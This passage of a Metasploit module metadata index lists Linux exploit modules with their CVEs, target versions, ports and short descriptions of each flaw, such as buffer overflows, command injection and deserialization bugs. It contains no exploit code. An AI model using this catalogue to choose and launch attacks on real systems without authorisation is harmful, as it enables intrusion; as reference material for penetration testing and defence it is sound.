"exploit_linux/misc/hplip_hpssd_exec": {
"name": "HPLIP hpssd.py From Address Arbitrary Command Execution",
"full_name": "exploit/linux/misc/hplip_hpssd_exec",
"rank": 600,
"disclosure_date": "2007-10-04",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a command execution vulnerable in the hpssd.py\n daemon of the Hewlett-Packard Linux Imaging and Printing Project.\n According to MITRE, versions 1.x and 2.x before 2.7.10 are vulnerable.\n\n This module was written and tested using the Fedora 6 Linux distribution.\n On the test system, the daemon listens on localhost only and runs with\n root privileges. Although the configuration shows the daemon is to\n listen on port 2207, it actually listens on a dynamic port.\n\n NOTE: If the target system does not have a 'sendmail' command installed,\n this vulnerability cannot be exploited.",
"references": [
"CVE-2007-5208",
"OSVDB-41693",
"BID-26054",
"URL-https://bugzilla.redhat.com/show_bug.cgi?id=319921",
"URL-https://bugzilla.redhat.com/attachment.cgi?id=217201&action=edit"
],
"platform": "Unix",
"arch": "cmd",
"rport": 2207,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic (hplip-1.6.7-4.i386.rpm)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/misc/hplip_hpssd_exec.rb",
"is_install_path": true,
"ref_name": "linux/misc/hplip_hpssd_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/misc/ib_inet_connect": {
"name": "Borland InterBase INET_connect() Buffer Overflow",
"full_name": "exploit/linux/misc/ib_inet_connect",
"rank": 400,
"disclosure_date": "2007-10-03",
"type": "exploit",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>",
"Adriano Lima <adriano@risesecurity.org>"
],
"description": "This module exploits a stack buffer overflow in Borland InterBase\n by sending a specially crafted service attach request.",
"references": [
"CVE-2007-5243",
"OSVDB-38605",
"BID-25917",
"URL-http://www.risesecurity.org/advisories/RISE-2007002.txt"
],
"platform": "Linux",
"arch": "x86",
"rport": 3050,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Borland InterBase LI-V8.0.0.53 LI-V8.0.0.54 LI-V8.1.0.253"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/misc/ib_inet_connect.rb",
"is_install_path": true,
"ref_name": "linux/misc/ib_inet_connect",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/misc/ib_jrd8_create_database": {
"name": "Borland InterBase jrd8_create_database() Buffer Overflow",
"full_name": "exploit/linux/misc/ib_jrd8_create_database",
"rank": 400,
"disclosure_date": "2007-10-03",
"type": "exploit",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>",
"Adriano Lima <adriano@risesecurity.org>"
],
"description": "This module exploits a stack buffer overflow in Borland InterBase\n by sending a specially crafted create request.",
"references": [
"CVE-2007-5243",
"OSVDB-38606",
"BID-25917",
"URL-http://www.risesecurity.org/advisories/RISE-2007002.txt"
],
"platform": "Linux",
"arch": "x86",
"rport": 3050,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Borland InterBase LI-V8.0.0.53 LI-V8.0.0.54 LI-V8.1.0.253"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/misc/ib_jrd8_create_database.rb",
"is_install_path": true,
"ref_name": "linux/misc/ib_jrd8_create_database",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/misc/ib_open_marker_file": {
"name": "Borland InterBase open_marker_file() Buffer Overflow",
"full_name": "exploit/linux/misc/ib_open_marker_file",
"rank": 400,
"disclosure_date": "2007-10-03",
"type": "exploit",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>",
"Adriano Lima <adriano@risesecurity.org>"
],
"description": "This module exploits a stack buffer overflow in Borland InterBase\n by sending a specially crafted attach request.",
"references": [
"CVE-2007-5244",
"OSVDB-38610",
"BID-25917",
"URL-http://www.risesecurity.org/advisories/RISE-2007002.txt"
],
"platform": "Linux",
"arch": "x86",
"rport": 3050,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Borland InterBase LI-V8.0.0.53 LI-V8.0.0.54 LI-V8.1.0.253"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/misc/ib_open_marker_file.rb",
"is_install_path": true,
"ref_name": "linux/misc/ib_open_marker_file",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/misc/ib_pwd_db_aliased": {
"name": "Borland InterBase PWD_db_aliased() Buffer Overflow",
"full_name": "exploit/linux/misc/ib_pwd_db_aliased",
"rank": 400,
"disclosure_date": "2007-10-03",
"type": "exploit",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>",
"Adriano Lima <adriano@risesecurity.org>"
],
"description": "This module exploits a stack buffer overflow in Borland InterBase\n by sending a specially crafted attach request.",
"references": [
"CVE-2007-5243",
"OSVDB-38607",
"BID-25917",
"URL-http://www.risesecurity.org/advisories/RISE-2007002.txt"
],
"platform": "Linux",
"arch": "x86",
"rport": 3050,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Borland InterBase LI-V8.0.0.53 LI-V8.0.0.54 LI-V8.1.0.253"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/misc/ib_pwd_db_aliased.rb",
"is_install_path": true,
"ref_name": "linux/misc/ib_pwd_db_aliased",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/misc/jenkins_java_deserialize": {
"name": "Jenkins CLI RMI Java Deserialization Vulnerability",
"full_name": "exploit/linux/misc/jenkins_java_deserialize",
"rank": 600,
"disclosure_date": "2015-11-18",
"type": "exploit",
"author": [
"Christopher Frohoff",
"Steve Breen",
"Dev Mohanty",
"Louis Sato",
"wvu <wvu@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>",
"Wei Chen"
],
"description": "This module exploits a vulnerability in Jenkins. An unsafe deserialization bug exists on\n the Jenkins master, which allows remote arbitrary code execution. Authentication is not\n required to exploit this vulnerability.",
"references": [
"CVE-2015-8103",
"URL-https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/jenkins.py",
"URL-https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java",
"URL-http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability",
"URL-https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11"
],
"platform": "Java",
"arch": "java",
"rport": "8080",
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Jenkins 1.637"
],
"mod_time": "2019-02-22 17:01:49 +0000",
"path": "/modules/exploits/linux/misc/jenkins_java_deserialize.rb",
"is_install_path": true,
"ref_name": "linux/misc/jenkins_java_deserialize",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/misc/jenkins_ldap_deserialize": {
"name": "Jenkins CLI HTTP Java Deserialization Vulnerability",
"full_name": "exploit/linux/misc/jenkins_ldap_deserialize",
"rank": 600,
"disclosure_date": "2016-11-16",
"type": "exploit",
"author": [
"Matthias Kaiser",
"Alisa Esage",
"Ivan",
"YSOSerial"
],
"description": "This module exploits a vulnerability in Jenkins. An unsafe deserialization bug exists on\n the Jenkins, which allows remote arbitrary code execution via HTTP. Authentication is not\n required to exploit this vulnerability.",
"references": [
"CVE-2016-9299",
"URL-https://github.com/jenkinsci-cert/SECURITY-218",
"URL-https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2016-11-16",
"URL-http://www.slideshare.net/codewhitesec/java-deserialization-vulnerabilities-the-forgotten-bug-class-deepsec-edition",
"URL-https://github.com/frohoff/ysoserial"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": "8080",
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Jenkins 2.31"
],
"mod_time": "2018-05-16 05:29:25 +0000",
"path": "/modules/exploits/linux/misc/jenkins_ldap_deserialize.rb",
"is_install_path": true,
"ref_name": "linux/misc/jenkins_ldap_deserialize",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/misc/lprng_format_string": {
"name": "LPRng use_syslog Remote Format String Vulnerability",
"full_name": "exploit/linux/misc/lprng_format_string",
"rank": 300,
"disclosure_date": "2000-09-25",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a format string vulnerability in the LPRng print server.\n This vulnerability was discovered by Chris Evans. There was a publicly\n circulating worm targeting this vulnerability, which prompted RedHat to pull\n their 7.0 release. They consequently re-released it as \"7.0-respin\".",
"references": [
"CVE-2000-0917",
"OSVDB-421",
"BID-1712",
"US-CERT-VU-382365",
"URL-http://www.cert.org/advisories/CA-2000-22.html",
"URL-https://bugzilla.redhat.com/show_bug.cgi?id=17756",
"EDB-226",
"EDB-227",
"EDB-230"
],
"platform": "Linux",
"arch": "x86",
"rport": 515,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Caldera OpenLinux 2.3 Bruteforce",
"Debug"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/misc/lprng_format_string.rb",
"is_install_path": true,
"ref_name": "linux/misc/lprng_format_string",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/misc/mongod_native_helper": {
"name": "MongoDB nativeHelper.apply Remote Code Execution",
"full_name": "exploit/linux/misc/mongod_native_helper",
"rank": 300,
"disclosure_date": "2013-03-24",
"type": "exploit",
"author": [
"agix"
],
"description": "This module exploits the nativeHelper feature from spiderMonkey which allows\n remote code execution by calling it with specially crafted arguments. This module\n has been tested successfully on MongoDB 2.2.3 on Ubuntu 10.04 and Debian Squeeze.",
"references": [
"CVE-2013-1892",
"OSVDB-91632",
"BID-58695",
"URL-http://blog.scrt.ch/2013/03/24/mongodb-0-day-ssji-to-rce/"
],
"platform": "Linux",
"arch": "",
"rport": 27017,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Linux - mongod 2.2.3 - 32bits"
],
"mod_time": "2018-08-09 23:34:03 +0000",
"path": "/modules/exploits/linux/misc/mongod_native_helper.rb",
"is_install_path": true,
"ref_name": "linux/misc/mongod_native_helper",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_linux/misc/nagios_nrpe_arguments": {
"name": "Nagios Remote Plugin Executor Arbitrary Command Execution",
"full_name": "exploit/linux/misc/nagios_nrpe_arguments",
"rank": 600,
"disclosure_date": "2013-02-21",
"type": "exploit",
"author": [
"Rudolph Pereir",
"jwpari <jwpari@beersec.org>"
],
"description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.",
"references": [
"CVE-2013-1362",
"OSVDB-90582",
"BID-58142",
"URL-http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability"
],
"platform": "Unix",
"arch": "cmd",
"rport": 5666,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Nagios Remote Plugin Executor prior to 2.14"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/misc/nagios_nrpe_arguments.rb",
"is_install_path": true,
"ref_name": "linux/misc/nagios_nrpe_arguments",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/misc/netcore_udp_53413_backdoor": {
"name": "Netcore Router Udp 53413 Backdoor",
"full_name": "exploit/linux/misc/netcore_udp_53413_backdoor",
"rank": 300,
"disclosure_date": "2014-08-25",
"type": "exploit",
"author": [
"Nixawk",
"h00die <mike@shorebreaksecurity.com>"
],
"description": "Routers manufactured by Netcore, a popular brand for networking\n equipment in China, have a wide-open backdoor that can be fairly\n easily exploited by attackers. These products are also sold under\n the Netis brand name outside of China. This backdoor allows\n cyber criminals to easily run arbitrary code on these routers,\n rendering it vulnerable as a security device.\n Some models include a non-standard echo command which doesn't\n honor -e, and are therefore not currently exploitable with\n Metasploit. See URLs or module markdown for additional options.",
"references": [
"URL-https://www.seebug.org/vuldb/ssvid-90227",
"URL-http://blog.trendmicro.com/trendlabs-security-intelligence/netis-routers-leave-wide-open-backdoor/",
"URL-https://github.com/h00die/MSF-Testing-Scripts/blob/master/netis_backdoor.py"
],
"platform": "",
"arch": "",
"rport": 53413,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"MIPS Little Endian",
"MIPS Big Endian"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/misc/netcore_udp_53413_backdoor.rb",
"is_install_path": true,
"ref_name": "linux/misc/netcore_udp_53413_backdoor",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/misc/netsupport_manager_agent": {
"name": "NetSupport Manager Agent Remote Buffer Overflow",
"full_name": "exploit/linux/misc/netsupport_manager_agent",
"rank": 200,
"disclosure_date": "2011-01-08",
"type": "exploit",
"author": [
"Luca Carettoni ( <Luca Carettoni (@_ikki)>",
"Evan",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a buffer overflow in NetSupport Manager Agent. It\n uses a similar ROP to the proftpd_iac exploit in order to avoid non executable stack.",
"references": [
"CVE-2011-0404",
"OSVDB-70408",
"BID-45728",
"URL-https://seclists.org/fulldisclosure/2011/Jan/90",
"EDB-15937"
],
"platform": "Linux",
"arch": "x86",
"rport": 5405,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"linux"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/linux/misc/netsupport_manager_agent.rb",
"is_install_path": true,
"ref_name": "linux/misc/netsupport_manager_agent",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/misc/novell_edirectory_ncp_bof": {
"name": "Novell eDirectory 8 Buffer Overflow",
"full_name": "exploit/linux/misc/novell_edirectory_ncp_bof",
"rank": 300,
"disclosure_date": "2012-12-12",
"type": "exploit",
"author": [
"David Klein",
"Gary Nilson",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This exploit abuses a buffer overflow vulnerability in Novell eDirectory. The\n vulnerability exists in the ndsd daemon, specifically in the NCP service, while\n parsing a specially crafted Keyed Object Login request. It allows remote code\n execution with root privileges.",
"references": [
"CVE-2012-0432",
"OSVDB-88718",
"BID-57038",
"EDB-24205",
"URL-http://www.novell.com/support/kb/doc.php?id=3426981",
"URL-https://seclists.org/fulldisclosure/2013/Jan/97"
],
"platform": "Linux",
"arch": "x86",
"rport": 524,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Novell eDirectory 8.8.7 v20701.33/ SLES 10 SP3"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb",
"is_install_path": true,
"ref_name": "linux/misc/novell_edirectory_ncp_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/misc/opennms_java_serialize": {
"name": "OpenNMS Java Object Unserialization Remote Code Execution",
"full_name": "exploit/linux/misc/opennms_java_serialize",
"rank": 300,
"disclosure_date": "2015-11-06",
"type": "exploit",
"author": [
"Ben Turner <benpturner@yahoo.com>"
],
"description": "This module exploits a vulnerability in the OpenNMS Java object which allows\n an unauthenticated attacker to run arbitrary code against the system.",
"references": [
"CVE-2015-8103",
"URL-http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/"
],
"platform": "",
"arch": "",
"rport": 1099,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"OpenNMS / Linux x86",
"OpenNMS / Linux x86_64"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/linux/misc/opennms_java_serialize.rb",
"is_install_path": true,
"ref_name": "linux/misc/opennms_java_serialize",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/misc/qnap_transcode_server": {
"name": "QNAP Transcode Server Command Execution",
"full_name": "exploit/linux/misc/qnap_transcode_server",
"rank": 600,
"disclosure_date": "2017-08-06",
"type": "exploit",
"author": [
"Zenofex",
"0x00string",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits an unauthenticated remote command injection\n vulnerability in QNAP NAS devices. The transcoding server listens\n on port 9251 by default and is vulnerable to command injection\n using the 'rmfile' command.\n\n This module was tested successfully on a QNAP TS-431 with\n firmware version 4.3.3.0262 (20170727).",
"references": [
"CVE-2017-13067",
"URL-https://www.exploitee.rs/index.php/QNAP_TS-131",
"URL-http://docs.qnap.com/nas/4.1/Home/en/index.html?transcode_management.htm"
],
"platform": "Linux",
"arch": "armle",
"rport": 9251,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/linux/misc/qnap_transcode_server.rb",
"is_install_path": true,
"ref_name": "linux/misc/qnap_transcode_server",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/misc/quest_pmmasterd_bof": {
"name": "Quest Privilege Manager pmmasterd Buffer Overflow",
"full_name": "exploit/linux/misc/quest_pmmasterd_bof",
"rank": 300,
"disclosure_date": "2017-04-09",
"type": "exploit",
"author": [
"m0t"
],
"description": "This modules exploits a buffer overflow in the Quest Privilege Manager,\n a software used to integrate Active Directory with Linux and Unix\n systems. The vulnerability exists in the pmmasterd daemon, and can only\n triggered when the host has been configured as a policy server (\n Privilege Manager for Unix or Quest Sudo Plugin). A buffer overflow\n condition exists when handling requests of type ACT_ALERT_EVENT, where\n the size of a memcpy can be controlled by the attacker. This module\n only works against version < 6.0.0-27. Versions up to 6.0.0-50 are also\n vulnerable, but not supported by this module (a stack cookie bypass is\n required). NOTE: To use this module it is required to be able to bind a\n privileged port ( <=1024 ) as the server refuses connections coming\n from unprivileged ports, which in most situations means that root\n privileges are required.",
"references": [
"CVE-2017-6553",
"URL-https://0xdeadface.wordpress.com/2017/04/07/multiple-vulnerabilities-in-quest-privilege-manager-6-0-0-xx-cve-2017-6553-cve-2017-6554/"
],
"platform": "Unix",
"arch": "cmd",
"rport": 12345,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Quest Privilege Manager pmmasterd 6.0.0-27 x64",
"Quest Privilege Manager pmmasterd 6.0.0-27 x86"
],
"mod_time": "2017-08-18 00:19:09 +0000",
"path": "/modules/exploits/linux/misc/quest_pmmasterd_bof.rb",
"is_install_path": true,
"ref_name": "linux/misc/quest_pmmasterd_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/misc/sercomm_exec": {
"name": "SerComm Device Remote Code Execution",
"full_name": "exploit/linux/misc/sercomm_exec",
"rank": 500,
"disclosure_date": "2013-12-31",
"type": "exploit",
"author": [
"Eloi Vanderbeken <eloi.vanderbeken@gmail.com>",
"Matt \"hostess\" Andreko <mandreko@accuvant.com>"
],
"description": "This module will cause remote code execution on several SerComm devices.\n These devices typically include routers from NetGear and Linksys.\n This module was tested successfully against several NetGear, Honeywell\n and Cisco devices.",
"references": [
"OSVDB-101653",
"URL-https://github.com/elvanderb/TCP-32764"
],
"platform": "Linux",
"arch": "",
"rport": 32764,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Generic Linux MIPS Big Endian",
"Generic Linux MIPS Little Endian",
"Manual Linux MIPS Big Endian",
"Manual Linux MIPS Little Endian",
"Cisco WAP4410N",
"Honeywell WAP-PL2 IP Camera",
"Netgear DG834",
"Netgear DG834G",
"Netgear DG834PN",
"Netgear DGN1000",
"Netgear DSG835",
"Netgear WPNT834"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/misc/sercomm_exec.rb",
"is_install_path": true,
"ref_name": "linux/misc/sercomm_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/misc/ueb9_bpserverd": {
"name": "Unitrends UEB bpserverd authentication bypass RCE",
"full_name": "exploit/linux/misc/ueb9_bpserverd",
"rank": 600,
"disclosure_date": "2017-08-08",
"type": "exploit",
"author": [
"Jared Arave",
"Cale Smith",
"Benny Husted"
],
"description": "It was discovered that the Unitrends bpserverd proprietary protocol, as exposed via xinetd,\n has an issue in which its authentication can be bypassed. A remote attacker could use this\n issue to execute arbitrary commands with root privilege on the target system.",
"references": [
"URL-https://support.unitrends.com/UnitrendsBackup/s/article/ka640000000CcZeAAK/000005755",
"URL-https://nvd.nist.gov/vuln/detail/CVE-2017-12477",
"CVE-2017-12477"
],
"platform": "Linux",
"arch": "x86",
"rport": 1743,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"UEB 9.*"
],
"mod_time": "2017-10-20 19:59:24 +0000",
"path": "/modules/exploits/linux/misc/ueb9_bpserverd.rb",
"is_install_path": true,
"ref_name": "linux/misc/ueb9_bpserverd",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/misc/zabbix_server_exec": {
"name": "Zabbix Server Arbitrary Command Execution",
"full_name": "exploit/linux/misc/zabbix_server_exec",
"rank": 600,
"disclosure_date": "2009-09-10",
"type": "exploit",
"author": [
"Nicob <nicob@nicob.net>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses the \"Command\" trap in Zabbix Server to execute arbitrary\n commands without authentication. By default the Node ID \"0\" is used, if it doesn't\n work, the Node ID is leaked from the error message and exploitation retried.\n\n According to the vendor versions prior to 1.6.9 are vulnerable. The vulnerability\n has been successfully tested on Zabbix Server 1.6.7 on Ubuntu 10.04.",
"references": [
"CVE-2009-4498",
"OSVDB-60965",
"BID-37989",
"EDB-10432",
"URL-https://support.zabbix.com/browse/ZBX-1030"
],
"platform": "Unix",
"arch": "cmd",
"rport": 10051,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Zabbix 1.6.7"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/misc/zabbix_server_exec.rb",
"is_install_path": true,
"ref_name": "linux/misc/zabbix_server_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/mysql/mysql_yassl_getname": {
"name": "MySQL yaSSL CertDecoder::GetName Buffer Overflow",
"full_name": "exploit/linux/mysql/mysql_yassl_getname",
"rank": 400,
"disclosure_date": "2010-01-25",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the yaSSL (1.9.8 and earlier)\n implementation bundled with MySQL. By sending a specially crafted\n client certificate, an attacker can execute arbitrary code.\n\n This vulnerability is present within the CertDecoder::GetName function inside\n \"taocrypt/src/asn.cpp\". However, the stack buffer that is written to exists\n within a parent function's stack frame.\n\n NOTE: This vulnerability requires a non-default configuration. First, the attacker\n must be able to pass the host-based authentication. Next, the server must be\n configured to listen on an accessible network interface. Lastly, the server\n must have been manually configured to use SSL.\n\n The binary from version 5.5.0-m2 was built with /GS and /SafeSEH. During testing\n on Windows XP SP3, these protections successfully prevented exploitation.\n\n Testing was also done with mysql on Ubuntu 9.04. Although the vulnerable code is\n present, both version 5.5.0-m2 built from source and version 5.0.75 from a binary\n package were not exploitable due to the use of the compiler's FORTIFY feature.\n\n Although suse11 was mentioned in the original blog post, the binary package they\n provide does not contain yaSSL or support SSL.",
"references": [
"CVE-2009-4484",
"BID-37640",
"BID-37943",
"BID-37974",
"OSVDB-61956",
"URL-http://secunia.com/advisories/38344/"
],
"platform": "Linux",
"arch": "",
"rport": 3306,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Debian 5.0 - MySQL (5.0.51a-24+lenny2)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/mysql/mysql_yassl_getname.rb",
"is_install_path": true,
"ref_name": "linux/mysql/mysql_yassl_getname",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/mysql/mysql_yassl_hello": {
"name": "MySQL yaSSL SSL Hello Message Buffer Overflow",
"full_name": "exploit/linux/mysql/mysql_yassl_hello",
"rank": 400,
"disclosure_date": "2008-01-04",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the yaSSL (1.7.5 and earlier)\n implementation bundled with MySQL <= 6.0. By sending a specially crafted\n Hello packet, an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2008-0226",
"OSVDB-41195",
"BID-27140"
],
"platform": "Linux",
"arch": "",
"rport": 3306,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"MySQL 5.0.45-Debian_1ubuntu3.1-log"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/mysql/mysql_yassl_hello.rb",
"is_install_path": true,
"ref_name": "linux/mysql/mysql_yassl_hello",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/pop3/cyrus_pop3d_popsubfolders": {
"name": "Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow",
"full_name": "exploit/linux/pop3/cyrus_pop3d_popsubfolders",
"rank": 300,
"disclosure_date": "2006-05-21",
"type": "exploit",
"author": [
"bannedit <bannedit@metasploit.com>",
"jduck <jduck@metasploit.com>"
],
"description": "This exploit takes advantage of a stack based overflow. Once the stack\n corruption has occurred it is possible to overwrite a pointer which is\n later used for a memcpy. This gives us a write anything anywhere condition\n similar to a format string vulnerability.\n\n NOTE: The popsubfolders option is a non-default setting.\n\n I chose to overwrite the GOT with my shellcode and return to it. This\n defeats the VA random patch and possibly other stack protection features.\n\n Tested on gentoo-sources Linux 2.6.16. Although Fedora CORE 5 ships with\n a version containing the vulnerable code, it is not exploitable due to the\n use of the FORTIFY_SOURCE compiler enhancement",
"references": [
"CVE-2006-2502",
"OSVDB-25853",
"BID-18056",
"EDB-2053",
"EDB-2185",
"URL-http://archives.neohapsis.com/archives/fulldisclosure/2006-05/0527.html"
],
"platform": "Linux",
"arch": "",
"rport": 110,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Gentoo 2006.0 Linux 2.6"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/pop3/cyrus_pop3d_popsubfolders.rb",
"is_install_path": true,
"ref_name": "linux/pop3/cyrus_pop3d_popsubfolders",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/postgres/postgres_payload": {
"name": "PostgreSQL for Linux Payload Execution",
"full_name": "exploit/linux/postgres/postgres_payload",
"rank": 600,
"disclosure_date": "2007-06-05",
"type": "exploit",
"author": [
"midnitesnake",
"egypt <egypt@metasploit.com>",
"todb <todb@metasploit.com>"
],
"description": "On some default Linux installations of PostgreSQL, the\n postgres service account may write to the /tmp directory, and\n may source UDF Shared Libraries from there as well, allowing\n execution of arbitrary code.\n\n This module compiles a Linux shared object file, uploads it to\n the target host via the UPDATE pg_largeobject method of binary\n injection, and creates a UDF (user defined function) from that\n shared object. Because the payload is run as the shared object's\n constructor, it does not need to conform to specific Postgres\n API versions.",
"references": [
"CVE-2007-3280",
"URL-http://www.leidecker.info/pgshell/Having_Fun_With_PostgreSQL.txt"
],
"platform": "Linux",
"arch": "",
"rport": 5432,
"autofilter_ports": [
5432
],
"autofilter_services": [
"postgres"
],
"targets": [
"Linux x86",
"Linux x86_64"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/linux/postgres/postgres_payload.rb",
"is_install_path": true,
"ref_name": "linux/postgres/postgres_payload",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/pptp/poptop_negative_read": {
"name": "Poptop Negative Read Overflow",
"full_name": "exploit/linux/pptp/poptop_negative_read",
"rank": 500,
"disclosure_date": "2003-04-09",
"type": "exploit",
"author": [
"spoonm <spoonm@no$email.com>"
],
"description": "This is an exploit for the Poptop negative read overflow. This will\n work against versions prior to 1.1.3-b3 and 1.1.3-20030409, but I\n currently do not have a good way to detect Poptop versions.\n\n The server will by default only allow 4 concurrent manager processes\n (what we run our code in), so you could have a max of 4 shells at once.\n\n Using the current method of exploitation, our socket will be closed\n before we have the ability to run code, preventing the use of Findsock.",
"references": [
"CVE-2003-0213",
"OSVDB-3293",
"URL-http://securityfocus.com/archive/1/317995",
"URL-http://www.freewebs.com/blightninjas/"
],
"platform": "Linux",
"arch": "x86",
"rport": 1723,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Linux Bruteforce"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/pptp/poptop_negative_read.rb",
"is_install_path": true,
"ref_name": "linux/pptp/poptop_negative_read",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/proxy/squid_ntlm_authenticate": {
"name": "Squid NTLM Authenticate Overflow",
"full_name": "exploit/linux/proxy/squid_ntlm_authenticate",
"rank": 500,
"disclosure_date": "2004-06-08",
"type": "exploit",
"author": [
"skape <mmiller@hick.org>"
],
"description": "This is an exploit for Squid\\'s NTLM authenticate overflow\n (libntlmssp.c). Due to improper bounds checking in\n ntlm_check_auth, it is possible to overflow the 'pass'\n variable on the stack with user controlled data of a user\n defined length. Props to iDEFENSE for the advisory.",
"references": [
"CVE-2004-0541",
"OSVDB-6791",
"URL-http://www.idefense.com/application/poi/display?id=107",
"BID-10500"
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
